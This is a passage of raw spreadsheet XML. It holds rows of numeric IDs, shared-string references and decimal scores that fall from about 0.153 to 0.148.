        <v>29629.0</v>
      </c>
      <c r="B16679" s="2">
        <v>3.3701738E7</v>
      </c>
      <c r="C16679" s="2" t="s">
        <v>16091</v>
      </c>
      <c r="D16679" s="2">
        <v>1.0</v>
      </c>
      <c r="E16679" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16679" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16680" ht="15.75" customHeight="1">
      <c r="A16680" s="1">
        <v>29993.0</v>
      </c>
      <c r="B16680" s="2">
        <v>3612218.0</v>
      </c>
      <c r="C16680" s="2" t="s">
        <v>16092</v>
      </c>
      <c r="D16680" s="2">
        <v>1.0</v>
      </c>
      <c r="E16680" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16680" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16681" ht="15.75" customHeight="1">
      <c r="A16681" s="1">
        <v>30282.0</v>
      </c>
      <c r="B16681" s="2">
        <v>3.7729338E7</v>
      </c>
      <c r="C16681" s="2" t="s">
        <v>16093</v>
      </c>
      <c r="D16681" s="2">
        <v>1.0</v>
      </c>
      <c r="E16681" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16681" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16682" ht="15.75" customHeight="1">
      <c r="A16682" s="1">
        <v>32611.0</v>
      </c>
      <c r="B16682" s="2">
        <v>5827355.0</v>
      </c>
      <c r="C16682" s="2" t="s">
        <v>16087</v>
      </c>
      <c r="D16682" s="2">
        <v>1.0</v>
      </c>
      <c r="E16682" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16682" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16683" ht="15.75" customHeight="1">
      <c r="A16683" s="1">
        <v>32860.0</v>
      </c>
      <c r="B16683" s="2">
        <v>6280078.0</v>
      </c>
      <c r="C16683" s="2" t="s">
        <v>16087</v>
      </c>
      <c r="D16683" s="2">
        <v>1.0</v>
      </c>
      <c r="E16683" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16683" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16684" ht="15.75" customHeight="1">
      <c r="A16684" s="1">
        <v>32955.0</v>
      </c>
      <c r="B16684" s="2">
        <v>6504904.0</v>
      </c>
      <c r="C16684" s="2" t="s">
        <v>16094</v>
      </c>
      <c r="D16684" s="2">
        <v>1.0</v>
      </c>
      <c r="E16684" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16684" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16685" ht="15.75" customHeight="1">
      <c r="A16685" s="1">
        <v>33426.0</v>
      </c>
      <c r="B16685" s="2">
        <v>7775522.0</v>
      </c>
      <c r="C16685" s="2" t="s">
        <v>16095</v>
      </c>
      <c r="D16685" s="2">
        <v>1.0</v>
      </c>
      <c r="E16685" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16685" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16686" ht="15.75" customHeight="1">
      <c r="A16686" s="1">
        <v>21530.0</v>
      </c>
      <c r="B16686" s="2">
        <v>2.342901E7</v>
      </c>
      <c r="C16686" s="2" t="s">
        <v>16096</v>
      </c>
      <c r="D16686" s="2">
        <v>1.0</v>
      </c>
      <c r="E16686" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16686" s="2">
        <v>0.1525252525252525</v>
      </c>
    </row>
    <row r="16687" ht="15.75" customHeight="1">
      <c r="A16687" s="1">
        <v>1715.0</v>
      </c>
      <c r="B16687" s="2">
        <v>2.8600911E7</v>
      </c>
      <c r="C16687" s="2" t="s">
        <v>16097</v>
      </c>
      <c r="D16687" s="2">
        <v>1.0</v>
      </c>
      <c r="E16687" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16687" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="16688" ht="15.75" customHeight="1">
      <c r="A16688" s="1">
        <v>14353.0</v>
      </c>
      <c r="B16688" s="2">
        <v>3.8922401E7</v>
      </c>
      <c r="C16688" s="2" t="s">
        <v>16098</v>
      </c>
      <c r="D16688" s="2">
        <v>1.0</v>
      </c>
      <c r="E16688" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16688" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="16689" ht="15.75" customHeight="1">
      <c r="A16689" s="1">
        <v>10856.0</v>
      </c>
      <c r="B16689" s="2">
        <v>1627810.0</v>
      </c>
      <c r="C16689" s="2" t="s">
        <v>16099</v>
      </c>
      <c r="D16689" s="2">
        <v>1.0</v>
      </c>
      <c r="E16689" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16689" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="16690" ht="15.75" customHeight="1">
      <c r="A16690" s="1">
        <v>11501.0</v>
      </c>
      <c r="B16690" s="2">
        <v>2.2095519E7</v>
      </c>
      <c r="C16690" s="2" t="s">
        <v>16100</v>
      </c>
      <c r="D16690" s="2">
        <v>1.0</v>
      </c>
      <c r="E16690" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16690" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="16691" ht="15.75" customHeight="1">
      <c r="A16691" s="1">
        <v>24297.0</v>
      </c>
      <c r="B16691" s="2">
        <v>1.0561467E7</v>
      </c>
      <c r="C16691" s="2" t="s">
        <v>16101</v>
      </c>
      <c r="D16691" s="2">
        <v>1.0</v>
      </c>
      <c r="E16691" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16691" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="16692" ht="15.75" customHeight="1">
      <c r="A16692" s="1">
        <v>25668.0</v>
      </c>
      <c r="B16692" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16692" s="2" t="s">
        <v>16102</v>
      </c>
      <c r="D16692" s="2">
        <v>1.0</v>
      </c>
      <c r="E16692" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16692" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="16693" ht="15.75" customHeight="1">
      <c r="A16693" s="1">
        <v>17204.0</v>
      </c>
      <c r="B16693" s="2">
        <v>4.9023333E7</v>
      </c>
      <c r="C16693" s="2" t="s">
        <v>16103</v>
      </c>
      <c r="D16693" s="2">
        <v>1.0</v>
      </c>
      <c r="E16693" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16693" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="16694" ht="15.75" customHeight="1">
      <c r="A16694" s="1">
        <v>18185.0</v>
      </c>
      <c r="B16694" s="2">
        <v>5.2020271E7</v>
      </c>
      <c r="C16694" s="2" t="s">
        <v>16104</v>
      </c>
      <c r="D16694" s="2">
        <v>1.0</v>
      </c>
      <c r="E16694" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16694" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="16695" ht="15.75" customHeight="1">
      <c r="A16695" s="1">
        <v>19835.0</v>
      </c>
      <c r="B16695" s="2">
        <v>5.7057737E7</v>
      </c>
      <c r="C16695" s="2" t="s">
        <v>16105</v>
      </c>
      <c r="D16695" s="2">
        <v>1.0</v>
      </c>
      <c r="E16695" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16695" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="16696" ht="15.75" customHeight="1">
      <c r="A16696" s="1">
        <v>22432.0</v>
      </c>
      <c r="B16696" s="2">
        <v>3.6178199E7</v>
      </c>
      <c r="C16696" s="2" t="s">
        <v>16106</v>
      </c>
      <c r="D16696" s="2">
        <v>1.0</v>
      </c>
      <c r="E16696" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16696" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="16697" ht="15.75" customHeight="1">
      <c r="A16697" s="1">
        <v>25673.0</v>
      </c>
      <c r="B16697" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16697" s="2" t="s">
        <v>16107</v>
      </c>
      <c r="D16697" s="2">
        <v>1.0</v>
      </c>
      <c r="E16697" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16697" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="16698" ht="15.75" customHeight="1">
      <c r="A16698" s="1">
        <v>34179.0</v>
      </c>
      <c r="B16698" s="2">
        <v>9939900.0</v>
      </c>
      <c r="C16698" s="2" t="s">
        <v>16108</v>
      </c>
      <c r="D16698" s="2">
        <v>1.0</v>
      </c>
      <c r="E16698" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16698" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="16699" ht="15.75" customHeight="1">
      <c r="A16699" s="1">
        <v>28156.0</v>
      </c>
      <c r="B16699" s="2">
        <v>2.4887209E7</v>
      </c>
      <c r="C16699" s="2" t="s">
        <v>16109</v>
      </c>
      <c r="D16699" s="2">
        <v>1.0</v>
      </c>
      <c r="E16699" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16699" s="2">
        <v>0.1510721247563354</v>
      </c>
    </row>
    <row r="16700" ht="15.75" customHeight="1">
      <c r="A16700" s="1">
        <v>25831.0</v>
      </c>
      <c r="B16700" s="2">
        <v>1.4778692E7</v>
      </c>
      <c r="C16700" s="2" t="s">
        <v>16087</v>
      </c>
      <c r="D16700" s="2">
        <v>1.0</v>
      </c>
      <c r="E16700" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16700" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="16701" ht="15.75" customHeight="1">
      <c r="A16701" s="1">
        <v>27129.0</v>
      </c>
      <c r="B16701" s="2">
        <v>2.0732978E7</v>
      </c>
      <c r="C16701" s="2" t="s">
        <v>16110</v>
      </c>
      <c r="D16701" s="2">
        <v>1.0</v>
      </c>
      <c r="E16701" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16701" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="16702" ht="15.75" customHeight="1">
      <c r="A16702" s="1">
        <v>27807.0</v>
      </c>
      <c r="B16702" s="2">
        <v>2.3292208E7</v>
      </c>
      <c r="C16702" s="2" t="s">
        <v>16085</v>
      </c>
      <c r="D16702" s="2">
        <v>1.0</v>
      </c>
      <c r="E16702" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16702" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="16703" ht="15.75" customHeight="1">
      <c r="A16703" s="1">
        <v>31708.0</v>
      </c>
      <c r="B16703" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C16703" s="2" t="s">
        <v>16111</v>
      </c>
      <c r="D16703" s="2">
        <v>1.0</v>
      </c>
      <c r="E16703" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16703" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="16704" ht="15.75" customHeight="1">
      <c r="A16704" s="1">
        <v>13369.0</v>
      </c>
      <c r="B16704" s="2">
        <v>3.482655E7</v>
      </c>
      <c r="C16704" s="2" t="s">
        <v>16112</v>
      </c>
      <c r="D16704" s="2">
        <v>1.0</v>
      </c>
      <c r="E16704" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16704" s="2">
        <v>0.1506734006734007</v>
      </c>
    </row>
    <row r="16705" ht="15.75" customHeight="1">
      <c r="A16705" s="1">
        <v>19106.0</v>
      </c>
      <c r="B16705" s="2">
        <v>5.4734661E7</v>
      </c>
      <c r="C16705" s="2" t="s">
        <v>16113</v>
      </c>
      <c r="D16705" s="2">
        <v>1.0</v>
      </c>
      <c r="E16705" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16705" s="2">
        <v>0.1505050505050505</v>
      </c>
    </row>
    <row r="16706" ht="15.75" customHeight="1">
      <c r="A16706" s="1">
        <v>22478.0</v>
      </c>
      <c r="B16706" s="2">
        <v>3.6866836E7</v>
      </c>
      <c r="C16706" s="2" t="s">
        <v>16114</v>
      </c>
      <c r="D16706" s="2">
        <v>1.0</v>
      </c>
      <c r="E16706" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16706" s="2">
        <v>0.1503831417624522</v>
      </c>
    </row>
    <row r="16707" ht="15.75" customHeight="1">
      <c r="A16707" s="1">
        <v>15903.0</v>
      </c>
      <c r="B16707" s="2">
        <v>4.4628444E7</v>
      </c>
      <c r="C16707" s="2" t="s">
        <v>16115</v>
      </c>
      <c r="D16707" s="2">
        <v>1.0</v>
      </c>
      <c r="E16707" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16707" s="2">
        <v>0.1503831417624521</v>
      </c>
    </row>
    <row r="16708" ht="15.75" customHeight="1">
      <c r="A16708" s="1">
        <v>14055.0</v>
      </c>
      <c r="B16708" s="2">
        <v>3.753594E7</v>
      </c>
      <c r="C16708" s="2" t="s">
        <v>16116</v>
      </c>
      <c r="D16708" s="2">
        <v>1.0</v>
      </c>
      <c r="E16708" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16708" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="16709" ht="15.75" customHeight="1">
      <c r="A16709" s="1">
        <v>23041.0</v>
      </c>
      <c r="B16709" s="2">
        <v>5.0134748E7</v>
      </c>
      <c r="C16709" s="2" t="s">
        <v>16117</v>
      </c>
      <c r="D16709" s="2">
        <v>1.0</v>
      </c>
      <c r="E16709" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16709" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="16710" ht="15.75" customHeight="1">
      <c r="A16710" s="1">
        <v>23512.0</v>
      </c>
      <c r="B16710" s="2">
        <v>5827356.0</v>
      </c>
      <c r="C16710" s="2" t="s">
        <v>16118</v>
      </c>
      <c r="D16710" s="2">
        <v>1.0</v>
      </c>
      <c r="E16710" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16710" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="16711" ht="15.75" customHeight="1">
      <c r="A16711" s="1">
        <v>24707.0</v>
      </c>
      <c r="B16711" s="2">
        <v>1.1657937E7</v>
      </c>
      <c r="C16711" s="2" t="s">
        <v>16119</v>
      </c>
      <c r="D16711" s="2">
        <v>1.0</v>
      </c>
      <c r="E16711" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16711" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="16712" ht="15.75" customHeight="1">
      <c r="A16712" s="1">
        <v>25768.0</v>
      </c>
      <c r="B16712" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C16712" s="2" t="s">
        <v>16120</v>
      </c>
      <c r="D16712" s="2">
        <v>1.0</v>
      </c>
      <c r="E16712" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16712" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="16713" ht="15.75" customHeight="1">
      <c r="A16713" s="1">
        <v>26690.0</v>
      </c>
      <c r="B16713" s="2">
        <v>1.8132693E7</v>
      </c>
      <c r="C16713" s="2" t="s">
        <v>16121</v>
      </c>
      <c r="D16713" s="2">
        <v>1.0</v>
      </c>
      <c r="E16713" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16713" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="16714" ht="15.75" customHeight="1">
      <c r="A16714" s="1">
        <v>28209.0</v>
      </c>
      <c r="B16714" s="2">
        <v>2.5039331E7</v>
      </c>
      <c r="C16714" s="2" t="s">
        <v>16122</v>
      </c>
      <c r="D16714" s="2">
        <v>1.0</v>
      </c>
      <c r="E16714" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16714" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="16715" ht="15.75" customHeight="1">
      <c r="A16715" s="1">
        <v>32068.0</v>
      </c>
      <c r="B16715" s="2">
        <v>5379390.0</v>
      </c>
      <c r="C16715" s="2" t="s">
        <v>16123</v>
      </c>
      <c r="D16715" s="2">
        <v>1.0</v>
      </c>
      <c r="E16715" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16715" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="16716" ht="15.75" customHeight="1">
      <c r="A16716" s="1">
        <v>23154.0</v>
      </c>
      <c r="B16716" s="2">
        <v>5187256.0</v>
      </c>
      <c r="C16716" s="2" t="s">
        <v>16124</v>
      </c>
      <c r="D16716" s="2">
        <v>1.0</v>
      </c>
      <c r="E16716" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16716" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="16717" ht="15.75" customHeight="1">
      <c r="A16717" s="1">
        <v>12144.0</v>
      </c>
      <c r="B16717" s="2">
        <v>2.7107338E7</v>
      </c>
      <c r="C16717" s="2" t="s">
        <v>16125</v>
      </c>
      <c r="D16717" s="2">
        <v>1.0</v>
      </c>
      <c r="E16717" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16717" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="16718" ht="15.75" customHeight="1">
      <c r="A16718" s="1">
        <v>30471.0</v>
      </c>
      <c r="B16718" s="2">
        <v>3954997.0</v>
      </c>
      <c r="C16718" s="2" t="s">
        <v>16126</v>
      </c>
      <c r="D16718" s="2">
        <v>1.0</v>
      </c>
      <c r="E16718" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16718" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="16719" ht="15.75" customHeight="1">
      <c r="A16719" s="1">
        <v>55.0</v>
      </c>
      <c r="B16719" s="2">
        <v>1.1000933E7</v>
      </c>
      <c r="C16719" s="2" t="s">
        <v>16127</v>
      </c>
      <c r="D16719" s="2">
        <v>1.0</v>
      </c>
      <c r="E16719" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16719" s="2">
        <v>0.1491228070175439</v>
      </c>
    </row>
    <row r="16720" ht="15.75" customHeight="1">
      <c r="A16720" s="1">
        <v>11855.0</v>
      </c>
      <c r="B16720" s="2">
        <v>2.4812492E7</v>
      </c>
      <c r="C16720" s="2" t="s">
        <v>16128</v>
      </c>
      <c r="D16720" s="2">
        <v>1.0</v>
      </c>
      <c r="E16720" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16720" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="16721" ht="15.75" customHeight="1">
      <c r="A16721" s="1">
        <v>27689.0</v>
      </c>
      <c r="B16721" s="2">
        <v>2.2982735E7</v>
      </c>
      <c r="C16721" s="2" t="s">
        <v>16129</v>
      </c>
      <c r="D16721" s="2">
        <v>1.0</v>
      </c>
      <c r="E16721" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16721" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="16722" ht="15.75" customHeight="1">
      <c r="A16722" s="1">
        <v>22707.0</v>
      </c>
      <c r="B16722" s="2">
        <v>4.2857254E7</v>
      </c>
      <c r="C16722" s="2" t="s">
        <v>16130</v>
      </c>
      <c r="D16722" s="2">
        <v>1.0</v>
      </c>
      <c r="E16722" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16722" s="2">
        <v>0.1490299823633158</v>
      </c>
    </row>
    <row r="16723" ht="15.75" customHeight="1">
      <c r="A16723" s="1">
        <v>3051.0</v>
      </c>
      <c r="B16723" s="2">
        <v>3.6506077E7</v>
      </c>
      <c r="C16723" s="2" t="s">
        <v>16131</v>
      </c>
      <c r="D16723" s="2">
        <v>1.0</v>
      </c>
      <c r="E16723" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16723" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16724" ht="15.75" customHeight="1">
      <c r="A16724" s="1">
        <v>10497.0</v>
      </c>
      <c r="B16724" s="2">
        <v>1.1346448E7</v>
      </c>
      <c r="C16724" s="2" t="s">
        <v>16132</v>
      </c>
      <c r="D16724" s="2">
        <v>1.0</v>
      </c>
      <c r="E16724" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16724" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16725" ht="15.75" customHeight="1">
      <c r="A16725" s="1">
        <v>14139.0</v>
      </c>
      <c r="B16725" s="2">
        <v>3.793798E7</v>
      </c>
      <c r="C16725" s="2" t="s">
        <v>16133</v>
      </c>
      <c r="D16725" s="2">
        <v>1.0</v>
      </c>
      <c r="E16725" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16725" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16726" ht="15.75" customHeight="1">
      <c r="A16726" s="1">
        <v>14665.0</v>
      </c>
      <c r="B16726" s="2">
        <v>4.0451154E7</v>
      </c>
      <c r="C16726" s="2" t="s">
        <v>16134</v>
      </c>
      <c r="D16726" s="2">
        <v>1.0</v>
      </c>
      <c r="E16726" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16726" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16727" ht="15.75" customHeight="1">
      <c r="A16727" s="1">
        <v>19249.0</v>
      </c>
      <c r="B16727" s="2">
        <v>5.5112824E7</v>
      </c>
      <c r="C16727" s="2" t="s">
        <v>16135</v>
      </c>
      <c r="D16727" s="2">
        <v>1.0</v>
      </c>
      <c r="E16727" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16727" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16728" ht="15.75" customHeight="1">
      <c r="A16728" s="1">
        <v>21232.0</v>
      </c>
      <c r="B16728" s="2">
        <v>1.9677697E7</v>
      </c>
      <c r="C16728" s="2" t="s">
        <v>16136</v>
      </c>
      <c r="D16728" s="2">
        <v>1.0</v>
      </c>
      <c r="E16728" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16728" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16729" ht="15.75" customHeight="1">
      <c r="A16729" s="1">
        <v>24065.0</v>
      </c>
      <c r="B16729" s="2">
        <v>9625552.0</v>
      </c>
      <c r="C16729" s="2" t="s">
        <v>16137</v>
      </c>
      <c r="D16729" s="2">
        <v>1.0</v>
      </c>
      <c r="E16729" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16729" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16730" ht="15.75" customHeight="1">
      <c r="A16730" s="1">
        <v>24393.0</v>
      </c>
      <c r="B16730" s="2">
        <v>1.0783157E7</v>
      </c>
      <c r="C16730" s="2" t="s">
        <v>16138</v>
      </c>
      <c r="D16730" s="2">
        <v>1.0</v>
      </c>
      <c r="E16730" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16730" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16731" ht="15.75" customHeight="1">
      <c r="A16731" s="1">
        <v>29056.0</v>
      </c>
      <c r="B16731" s="2">
        <v>3.0243972E7</v>
      </c>
      <c r="C16731" s="2" t="s">
        <v>16139</v>
      </c>
      <c r="D16731" s="2">
        <v>1.0</v>
      </c>
      <c r="E16731" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16731" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16732" ht="15.75" customHeight="1">
      <c r="A16732" s="1">
        <v>29444.0</v>
      </c>
      <c r="B16732" s="2">
        <v>3.222131E7</v>
      </c>
      <c r="C16732" s="2" t="s">
        <v>16140</v>
      </c>
      <c r="D16732" s="2">
        <v>1.0</v>
      </c>
      <c r="E16732" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16732" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16733" ht="15.75" customHeight="1">
      <c r="A16733" s="1">
        <v>30959.0</v>
      </c>
      <c r="B16733" s="2">
        <v>4742843.0</v>
      </c>
      <c r="C16733" s="2" t="s">
        <v>16141</v>
      </c>
      <c r="D16733" s="2">
        <v>1.0</v>
      </c>
      <c r="E16733" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16733" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16734" ht="15.75" customHeight="1">
      <c r="A16734" s="1">
        <v>33098.0</v>
      </c>
      <c r="B16734" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C16734" s="2" t="s">
        <v>16142</v>
      </c>
      <c r="D16734" s="2">
        <v>1.0</v>
      </c>
      <c r="E16734" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16734" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16735" ht="15.75" customHeight="1">
      <c r="A16735" s="1">
        <v>33336.0</v>
      </c>
      <c r="B16735" s="2">
        <v>7587793.0</v>
      </c>
      <c r="C16735" s="2" t="s">
        <v>16143</v>
      </c>
      <c r="D16735" s="2">
        <v>1.0</v>
      </c>
      <c r="E16735" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16735" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16736" ht="15.75" customHeight="1">
      <c r="A16736" s="1">
        <v>33984.0</v>
      </c>
      <c r="B16736" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C16736" s="2" t="s">
        <v>16144</v>
      </c>
      <c r="D16736" s="2">
        <v>1.0</v>
      </c>
      <c r="E16736" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16736" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="16737" ht="15.75" customHeight="1">
      <c r="A16737" s="1">
        <v>15649.0</v>
      </c>
      <c r="B16737" s="2">
        <v>4.3615326E7</v>
      </c>
      <c r="C16737" s="2" t="s">
        <v>16145</v>
      </c>
      <c r="D16737" s="2">
        <v>1.0</v>
      </c>
      <c r="E16737" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16737" s="2">
        <v>0.1484674329501916</v>
      </c>
    </row>
    <row r="16738" ht="15.75" customHeight="1">
      <c r="A16738" s="1">
        <v>8977.0</v>
      </c>
      <c r="B16738" s="2">
        <v>5.4957178E7</v>
      </c>
      <c r="C16738" s="2" t="s">
        <v>16146</v>
      </c>
      <c r="D16738" s="2">
        <v>1.0</v>
      </c>
      <c r="E16738" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16738" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="16739" ht="15.75" customHeight="1">
      <c r="A16739" s="1">
        <v>29362.0</v>
      </c>
      <c r="B16739" s="2">
        <v>3.1656287E7</v>
      </c>
      <c r="C16739" s="2" t="s">
        <v>16147</v>
      </c>
      <c r="D16739" s="2">
        <v>1.0</v>
      </c>
      <c r="E16739" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16739" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="16740" ht="15.75" customHeight="1">
      <c r="A16740" s="1">
        <v>3196.0</v>
      </c>
      <c r="B16740" s="2">
        <v>3.7231665E7</v>
      </c>
      <c r="C16740" s="2" t="s">
        <v>16148</v>
      </c>
      <c r="D16740" s="2">
        <v>1.0</v>
      </c>
      <c r="E16740" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16740" s="2">
        <v>0.1484245439469321</v>
      </c>
    </row>
    <row r="16741" ht="15.75" customHeight="1">
      <c r="A16741" s="1">
        <v>5080.0</v>
      </c>
      <c r="B16741" s="2">
        <v>4.4458012E7</v>
      </c>
      <c r="C16741" s="2" t="s">
        <v>16149</v>
      </c>
      <c r="D16741" s="2">
        <v>1.0</v>
      </c>
      <c r="E16741" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16741" s="2">
        <v>0.148424543946932</v>
      </c>
    </row>
    <row r="16742" ht="15.75" customHeight="1">
      <c r="A16742" s="1">
        <v>27761.0</v>
      </c>
      <c r="B16742" s="2">
        <v>2.3106574E7</v>
      </c>
      <c r="C16742" s="2" t="s">
        <v>16150</v>
      </c>
      <c r="D16742" s="2">
        <v>1.0</v>
      </c>
      <c r="E16742" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16742" s="2">
        <v>0.147897897897898</v>
      </c>
    </row>
    <row r="16743" ht="15.75" customHeight="1">
      <c r="A16743" s="1">
        <v>11213.0</v>
      </c>
      <c r="B16743" s="2">
        <v>2010527.0</v>
      </c>
      <c r="C16743" s="2" t="s">
        <v>16151</v>
      </c>
      <c r="D16743" s="2">
        <v>1.0</v>
      </c>
      <c r="E16743" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16743" s="2">
        <v>0.1478758169934641</v>
      </c>
    </row>
    <row r="16744" ht="15.75" customHeight="1">
      <c r="A16744" s="1">
        <v>17040.0</v>
      </c>
      <c r="B16744" s="2">
        <v>4.8512467E7</v>
      </c>
      <c r="C16744" s="2" t="s">
        <v>16152</v>
      </c>
      <c r="D16744" s="2">
        <v>1.0</v>
      </c>
      <c r="E16744" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16744" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="16745" ht="15.75" customHeight="1">
      <c r="A16745" s="1">
        <v>21798.0</v>
      </c>
      <c r="B16745" s="2">
        <v>2.6636949E7</v>
      </c>
      <c r="C16745" s="2" t="s">
        <v>16153</v>
      </c>
      <c r="D16745" s="2">
        <v>1.0</v>
      </c>
      <c r="E16745" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16745" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="16746" ht="15.75" customHeight="1">
      <c r="A16746" s="1">
        <v>25523.0</v>
      </c>
      <c r="B16746" s="2">
